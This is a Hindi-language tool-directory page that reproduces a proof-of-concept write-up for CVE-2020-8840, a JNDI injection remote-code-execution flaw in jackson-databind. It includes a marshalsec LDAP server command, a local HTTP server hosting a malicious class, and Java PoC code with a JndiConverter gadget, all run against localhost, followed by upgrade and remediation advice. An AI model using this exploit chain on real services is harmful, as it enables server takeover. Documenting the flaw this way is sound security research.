Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-8840 — CVE-2020-8840 के लिए PoC शोषण: FasterXML jackson-databind में दूरस्थ कोड निष्पादन की ओर ले जाने वाला JNDI इंजेक्शन। पर्यावरण सेटअप, शोषण श्रृंखला और उपचार मार्गदर्शन शामिल है। | Kitploit
उपकरण/GitHubGitHub/fairyming/cve-2020-8840
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षालैब और अभ्यास
GitHubfairyming/cve-2020-8840

CVE-2020-8840

CVE-2020-8840 के लिए PoC शोषण: FasterXML jackson-databind में दूरस्थ कोड निष्पादन की ओर ले जाने वाला JNDI इंजेक्शन। पर्यावरण सेटअप, शोषण श्रृंखला और उपचार मार्गदर्शन शामिल है।

रिपॉजिटरी देखें
37716 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-8840: FasterXML/jackson-databind रिमोट कोड निष्पादन भेद्यता

0x00 परिचय

root@kitploit:~
jackson-databind FasterXML परियोजना समूह के अंतर्गत एक JSON प्रसंस्करण पुस्तकालय है।

0x01 भेद्यता अवलोकन

root@kitploit:~
19 फरवरी को, NVD ने एक सुरक्षा बुलेटिन जारी किया जिसमें jackson-databind में JNDI इंजेक्शन के कारण रिमोट कोड निष्पादन भेद्यता (CVE-2020-8840) का खुलासा किया गया, CVSS स्कोर 9.8 है। jackson-databind के प्रभावित संस्करणों में कुछ xbean-reflect/JNDI ब्लैकलिस्ट क्लासेस की अनुपस्थिति के कारण, जैसे org.apache.xbean.propertyeditor.JndiConverter, हमलावर JNDI इंजेक्शन का उपयोग करके रिमोट कोड निष्पादन कर सकते हैं, और सफल हमला सर्वर पर नियंत्रण प्राप्त कर सकता है (वेब सेवा स्तर)।

0x02 प्रभावित संस्करण

2.0.0 <= FasterXML jackson-databind Version <= 2.9.10.2

0x03 पर्यावरण सेटअप

  • jdk संस्करण: 1.81 [LDAP और RMI के साथ JNDI इंजेक्शन का उपयोग करने के लिए JDK संस्करण पर कुछ आवश्यकताएं हैं। नीचे दिए गए चित्र से हम Oracle द्वारा इसके सुधार समय को स्पष्ट रूप से देख सकते हैं।

20190606014739_69118.jpg

  1. वेब सर्वर निर्देशिका में पहले से संकलित दुर्भावनापूर्ण क्लास रखें। WX20200223-135435@2x.png यहाँ simplehttp का उपयोग करके वेब सेवा स्थापित की गई है।
root@kitploit:~
python -m SimpleHTTPServer 8080

image.png

  1. LDAP सेवा प्रारंभ करें। यहाँ marshalsec का उपयोग किया गया है। GitHub लिंक: https://github.com/mbechler/marshalsec
root@kitploit:~
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8080/#Exploit

image.png

  1. एक Java प्रोजेक्ट बनाएं और भेद्यता वाले संस्करण का JAR आयात करें। WX20200223-135855@2x.png

0x04 भेद्यता शोषण

  • संपूर्ण शोषण श्रृंखला
root@kitploit:~
poc --> ldap --> http
  • poc
root@kitploit:~
import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;

public class Poc {
    public static void main(String args[]) {
        ObjectMapper mapper = new ObjectMapper();

        mapper.enableDefaultTyping();

        String json = "[\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://localhost:1389/Exploit\"}]";

        try {
            mapper.readValue(json, Object.class);
        } catch (IOException e) {
            e.printStackTrace();
        }

    }
}
  • सीधे POC को निष्पादित करके, LDAP के माध्यम से वेब सर्वर पर स्थित दुर्भावनापूर्ण क्लास को लोड करें, जिससे रिमोट कोड निष्पादन होता है।

WX20200223-140159@2x.png

0x05 सुधार के तरीके

  1. jackson-databind को 2.9.10.3, 2.8.11.5, 2.10.x पर अपग्रेड करें।
  2. जाँच करें कि क्या परियोजना में xbean-reflect का उपयोग किया गया है। इस भेद्यता का मुख्य कारण xbean-reflect में एक विशेष शोषण श्रृंखला का अस्तित्व है जो उपयोगकर्ता को JNDI रिमोट क्लास लोडिंग ऑपरेशन ट्रिगर करने की अनुमति देती है। xbean-reflect को हटाने से भेद्यता के प्रभाव को कम किया जा सकता है।

संदर्भ लिंक:

https://cert.360.cn/warning/detail?id=1fe3b5ea888750006e0d64fb0df1e6ee

https://github.com/jas502n/CVE-2020-8840

टूल डाउनलोड करें